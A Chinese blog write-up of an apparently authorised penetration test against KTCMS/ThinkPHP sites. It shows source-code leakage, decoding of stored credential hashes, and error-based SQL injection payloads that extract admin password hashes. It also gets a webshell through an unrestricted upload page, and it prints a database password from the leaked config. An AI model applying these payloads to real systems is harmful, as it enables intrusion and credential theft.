QQ love member No. 3 seed player

know it then do it && APT086&QQ愛安全实验室成员

记一次常规渗透测试笔记(已授权)

20 Aug 2019 » security

[TOC]

由黑盒转白盒的一次渗透测试(已授权)

PS:拿到了三个站点,发现都是一样的程序 RT:

domain:【www.abc.comwww.test.comwww.aaa.com

0x1 信息收集

1. 框架: ThinkPHP V5.0.24   
# 测试了以前爆TP的命令执行漏洞失败

2. CMS:KTCMS     
# 搜索没发现与 KTCMS 相关的漏洞

3. 后台路径:/admin/login/        
# 手工测试常见弱口令无果,已知用户 admin 

KTCMS1

跑了一下路径发现源码泄露,路径如下:

www.abc.com/abc.com.tar.gz
www.test.com/test1.tar.gz
www.aaa.com/1aaa2019.tar.gz

下载源码找到数据库备份文件 /public/data/kt_cms.sql RT:

第一次见这种加密比较懵,问了群里表哥说解密方法每两个数字前面加个 % 然后URL解码,得到明文。

%61%64%6D%69%6E  # URL解码得出 admin

%32%31%32%33%32%66%32%39%37%61%35%37%61%35%61%37%34%33%38%39%34%61%30%65%34%61%38%30%31%66%63%33	# URL解码得出MD5值:21232f297a57a5a743894a0e4a801fc3 经过CMD5解密为 admin
%31		# URL解码得出 1

%63%34%63%61%34%32%33%38%61%30%62%39%32%33%38%32%30%64%63%63%35%30%39%61%36%66%37%35%38%34%39%62	# URL解码得出MD5值:c4ca4238a0b923820dcc509a6f75849b 	经过CMD5解密为 1

得到用户账号密码:

account:admin 	|  pwd:admin
account:1 	|  pwd: 1

数据库配置文件 config.php

// 数据库名
'database'        => '58_1',
// 用户名
'username'        => '58_1',
// 密码
'password'        => '4EHZAsJy7DiZFnsE',

0x2 SQL注入发现

进行后台登陆都显示密码错误( 密码已更改 ),BurpSuite 爆破 admin用户无果,手工测试用户1 密码2 成功登陆。RT:

KTCMS3

权限就一个搜索框栏目的功能,手工测试发现存在注入 RT:

KTCMS5

页面中给出了 数据库的账号密码及SQL查询报错的详细信息,我们直接查询 admin 的用户密码,前面源码泄露数据中有他的数据库结构 信息。

直接查询admin 用户的密码:

-a') and (select 1 from (select count(*),concat(floor(rand(0)*2),(select pwd from kt_sys_admin limit 1))a from information_schema.tables group by a)b)#

返回:

Duplicate entry '1ba32ca749f243590df6b520ddcc1a0ed' for key 'group_key'

KTCMS4

查询第二条密码:

-a') and (select 1 from (select count(*),concat(floor(rand(0)*2),(select pwd from kt_sys_admin limit 1,1))a from information_schema.tables group by a)b)#

返回:

Duplicate entry '1c81e728d9d4c2f636f067f89cc14862c' for key 'group_key'

KTCMS6

0x3 未授权访问&越权

KTCMS7

在 html 注释中发现多处未授权访问 RT:

KTCMS8

根据之前的源码发现多处未授权访问 但是并没有相应的权限进行相关操作。

0x4 上传GetShell

在源码中发现 upload_file.html 文件可以上传任意文件 RT:

KTCMS9

KTCMS10

成功拿到 webshell 登陆数据库,添加超级管理员账号 RT:

KTCMS11

KTCMS12

系统没法执行任何系统命令,观测为虚拟主机,另外两个站一样的思路。


「 转载请声明博客地址及APT086&QQ愛安全实验室 」